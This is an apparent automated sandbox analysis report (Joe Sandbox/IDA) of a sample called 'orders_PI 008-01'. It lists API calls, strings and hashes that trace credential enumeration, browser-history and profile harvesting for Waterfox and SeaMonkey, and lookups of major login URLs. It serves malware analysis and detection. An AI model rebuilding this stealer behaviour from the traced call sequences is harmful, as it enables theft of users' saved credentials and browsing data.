                                        • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                        • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                        • API String ID: 3849927982-2252543386
                                        • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                        • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                        • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                        • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                        Control-flow Graph (rendered graph not reproduced in text; function entry block 4091b8-40921b)

                                        APIs
                                        • memset.MSVCRT ref: 004091E2
                                          • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                        • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                        • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                        • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                        • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                        • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                        • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                        • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                        • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                        • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                        • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                        • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                        • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                        • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                        • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                        • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                        • String ID:
                                        • API String ID: 3715365532-3916222277
                                        • Opcode ID: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                        • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                        • Opcode Fuzzy Hash: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                        • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                          • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                          • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                          • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                          • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                          • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                        • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                        • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                        • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                        • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                          • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                          • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                          • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                          • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                        • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                        • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                        • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                        • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                        • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                        • CloseHandle.KERNEL32(?), ref: 0040E148
                                        • CloseHandle.KERNEL32(?), ref: 0040E14D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                        • String ID: bhv
                                        • API String ID: 4234240956-2689659898
                                        • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                        • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                        • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                        • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                        • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                        • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                        • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                        • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                        • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                        • API String ID: 2941347001-70141382
                                        • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                        • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                        • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                        • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                        Control-flow Graph

                                        APIs
                                        • memset.MSVCRT ref: 0040C298
                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                          • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                          • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                        • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                        • wcschr.MSVCRT ref: 0040C324
                                        • wcschr.MSVCRT ref: 0040C344
                                        • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                        • GetLastError.KERNEL32 ref: 0040C373
                                        • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                        • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                        • String ID: visited:
                                        • API String ID: 2470578098-1702587658
                                        • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                        • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                        • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                        • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                        • memset.MSVCRT ref: 0040E1BD
                                          • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                        • free.MSVCRT ref: 0040E28B
                                          • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                          • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                          • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                        • _snwprintf.MSVCRT ref: 0040E257
                                          • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                          • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                        • String ID: $ContainerId$Container_%I64d$Containers$Name
                                        • API String ID: 2804212203-2982631422
                                        • Opcode ID: 7a425c56cbbf5b1cc2378a83f6cf72cfb2264681b451cc294af70ec841fe14a3
                                        • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                        • Opcode Fuzzy Hash: 7a425c56cbbf5b1cc2378a83f6cf72cfb2264681b451cc294af70ec841fe14a3
                                        • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                          • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                          • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                        • memset.MSVCRT ref: 0040BC75
                                        • memset.MSVCRT ref: 0040BC8C
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                        • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                        • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                        • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                        • String ID:
                                        • API String ID: 115830560-3916222277
                                        • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                        • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                        • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                        • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                        Control-flow Graph

                                        APIs
                                        • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                        • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                        • GetLastError.KERNEL32 ref: 0041847E
                                        • free.MSVCRT ref: 0041848B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CreateFile$ErrorLastfree
                                        • String ID: |A
                                        • API String ID: 77810686-1717621600
                                        • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                        • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                        • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                        • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                        Control-flow Graph

                                        APIs
                                        • memset.MSVCRT ref: 0041249C
                                        • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                        • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                        • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                        • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                        • wcscpy.MSVCRT ref: 004125A0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                        • String ID: r!A
                                        • API String ID: 2791114272-628097481
                                        • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                        • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                        • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                        • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                        APIs
                                          • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                          • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                          • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                          • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                          • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                          • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                          • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                          • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                          • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                          • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                          • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                          • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                          • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                          • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                        • _wcslwr.MSVCRT ref: 0040C817
                                          • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                          • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                        • wcslen.MSVCRT ref: 0040C82C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                        • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                        • API String ID: 2936932814-4196376884
                                        • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                        • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                        • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                        • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                        APIs
                                        • memset.MSVCRT ref: 0040A824
                                        • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                        • wcscpy.MSVCRT ref: 0040A854
                                        • wcscat.MSVCRT ref: 0040A86A
                                        • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                        • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                        • String ID: C:\Windows\system32
                                        • API String ID: 669240632-2896066436
                                        APIs
                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                        • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                        • wcslen.MSVCRT ref: 0040BE06
                                        • wcsncmp.MSVCRT ref: 0040BE38
                                        • memset.MSVCRT ref: 0040BE91
                                        • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                        • _wcsnicmp.MSVCRT ref: 0040BEFC
                                        • wcschr.MSVCRT ref: 0040BF24
                                        • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                        Similarity
                                        • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                        • String ID:
                                        • API String ID: 697348961-0
                                        APIs
                                        • memset.MSVCRT ref: 00403CBF
                                        • memset.MSVCRT ref: 00403CD4
                                        • memset.MSVCRT ref: 00403CE9
                                        • memset.MSVCRT ref: 00403CFE
                                        • memset.MSVCRT ref: 00403D13
                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                          • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                          • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                        • memset.MSVCRT ref: 00403DDA
                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                        Strings
                                        Similarity
                                        • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                        • String ID: Waterfox$Waterfox\Profiles
                                        • API String ID: 4039892925-11920434
                                        APIs
                                        • memset.MSVCRT ref: 00403E50
                                        • memset.MSVCRT ref: 00403E65
                                        • memset.MSVCRT ref: 00403E7A
                                        • memset.MSVCRT ref: 00403E8F
                                        • memset.MSVCRT ref: 00403EA4
                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                          • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                          • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                        • memset.MSVCRT ref: 00403F6B
                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                        Strings
                                        Similarity
                                        • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                        • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                        • API String ID: 4039892925-2068335096
                                        APIs
                                        • memset.MSVCRT ref: 00403FE1
                                        • memset.MSVCRT ref: 00403FF6
                                        • memset.MSVCRT ref: 0040400B
                                        • memset.MSVCRT ref: 00404020
                                        • memset.MSVCRT ref: 00404035
                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                          • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                          • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
